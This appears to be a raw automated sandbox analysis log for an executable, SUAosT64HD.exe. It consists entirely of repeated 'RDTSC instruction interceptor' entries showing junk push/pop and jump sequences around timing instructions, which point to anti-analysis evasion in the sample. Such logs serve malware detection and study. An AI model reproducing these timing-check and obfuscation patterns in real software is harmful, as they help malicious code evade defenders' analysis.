Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2744 second address: 6F2749 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2749 second address: 6F2763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E71Dh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FC350C3E716h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F28F6 second address: 6F28FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F28FA second address: 6F2902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2902 second address: 6F2908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2908 second address: 6F2923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Eh 0x00000007 jp 00007FC350C3E716h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C28 second address: 6F2C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC3507E5376h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C34 second address: 6F2C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C38 second address: 6F2C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC3507E5386h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C5C second address: 6F2C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C60 second address: 6F2C6A instructions: 0x00000000 rdtsc 0x00000002 js 00007FC3507E5376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C6A second address: 6F2C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C75 second address: 6F2C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C7D second address: 6F2C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2EE8 second address: 6F2EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F305D second address: 6F306B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F306B second address: 6F3081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5382h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F8EAE second address: 6F8EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC350C3E71Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F788E second address: 6F7897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F7897 second address: 6F78B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC350C3E71Eh 0x0000000c jc 00007FC350C3E716h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F78B2 second address: 6F78B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F7B93 second address: 6F7B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F7E28 second address: 6F7E34 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC3507E5376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F83DA second address: 6F83DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F83DF second address: 6F83E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F8533 second address: 6F8537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F86D6 second address: 6F86DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F86DC second address: 6F870E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC350C3E726h 0x0000000b jbe 00007FC350C3E716h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jc 00007FC350C3E716h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F8876 second address: 6F887E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F887E second address: 6F8898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E720h 0x00000009 jo 00007FC350C3E716h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702E70 second address: 702E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702E76 second address: 702E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702E7A second address: 702E8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FC3507E5376h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702E8B second address: 702E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC350C3E71Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702E98 second address: 702EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702EA0 second address: 702EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702EA4 second address: 702EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702EA8 second address: 702ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC350C3E716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FC350C3E71Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC350C3E71Eh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702ED3 second address: 702ED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702A45 second address: 702A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702A49 second address: 702A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702A4F second address: 702A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7060E6 second address: 70610A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC3507E5376h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC3507E5381h 0x00000012 jnc 00007FC3507E5376h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70B6EF second address: 70B6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E71Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7FAA second address: 6B7FC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70BF4B second address: 70BF4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70BF4F second address: 70BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70BF55 second address: 70BF82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E725h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FC350C3E72Ah 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007FC350C3E716h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70C0EE second address: 70C11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC3507E5376h 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FC3507E5382h 0x00000015 jnc 00007FC3507E5376h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70E3B1 second address: 70E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 712083 second address: 712087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 712087 second address: 71209A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007FC350C3E716h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 71209A second address: 7120C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC3507E5376h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FC3507E5387h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7120C2 second address: 7120C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 719FF9 second address: 71A029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FC3507E5387h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 71A029 second address: 71A031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 718323 second address: 718336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FC3507E5378h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 718336 second address: 71835B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC350C3E716h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FC350C3E71Ah 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FC350C3E71Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 719728 second address: 71974A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC3507E5376h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FC3507E5384h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 71974A second address: 719760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007FC350C3E716h 0x0000000e jnc 00007FC350C3E716h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 719CF5 second address: 719D1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC3507E5389h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 723C07 second address: 723C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 723194 second address: 723198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 723198 second address: 7231A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7231A6 second address: 7231AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7231AD second address: 7231CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007FC350C3E716h 0x00000009 jmp 00007FC350C3E721h 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 723324 second address: 72333F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC3507E5376h 0x0000000a pop edx 0x0000000b jmp 00007FC3507E5380h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72333F second address: 72335A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E727h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72335A second address: 72335E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72BFA4 second address: 72BFAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72BFAB second address: 72BFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FC3507E537Eh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A619 second address: 72A62C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC350C3E71Eh 0x00000008 jno 00007FC350C3E716h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A62C second address: 72A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC3507E5376h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A79E second address: 72A7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC350C3E716h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A7AD second address: 72A7CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC3507E5387h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A8FE second address: 72A953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E729h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007FC350C3E716h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FC350C3E71Fh 0x0000001a popad 0x0000001b popad 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC350C3E722h 0x00000024 jl 00007FC350C3E716h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A953 second address: 72A95D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC3507E5376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72AA85 second address: 72AAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007FC350C3E71Eh 0x0000000b push esi 0x0000000c pop esi 0x0000000d js 00007FC350C3E716h 0x00000013 jnp 00007FC350C3E718h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c pushad 0x0000001d jmp 00007FC350C3E722h 0x00000022 push edx 0x00000023 jnp 00007FC350C3E716h 0x00000029 pop edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC350C3E728h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72ADA1 second address: 72ADC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC3507E5382h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FC3507E537Ah 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72AF30 second address: 72AF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 jmp 00007FC350C3E71Dh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72B68B second address: 72B6B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC3507E537Fh 0x0000000e je 00007FC3507E5376h 0x00000014 pushad 0x00000015 popad 0x00000016 je 00007FC3507E5376h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72B6B2 second address: 72B6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72B6BA second address: 72B6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7338A7 second address: 7338AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7338AB second address: 7338BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FC3507E5376h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7338BD second address: 7338C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7338C1 second address: 7338D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jng 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jc 00007FC3507E53B9h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7338D7 second address: 733907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E729h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E720h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 733A76 second address: 733A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 733A7A second address: 733A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 733C09 second address: 733C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5383h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 73FBFE second address: 73FC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
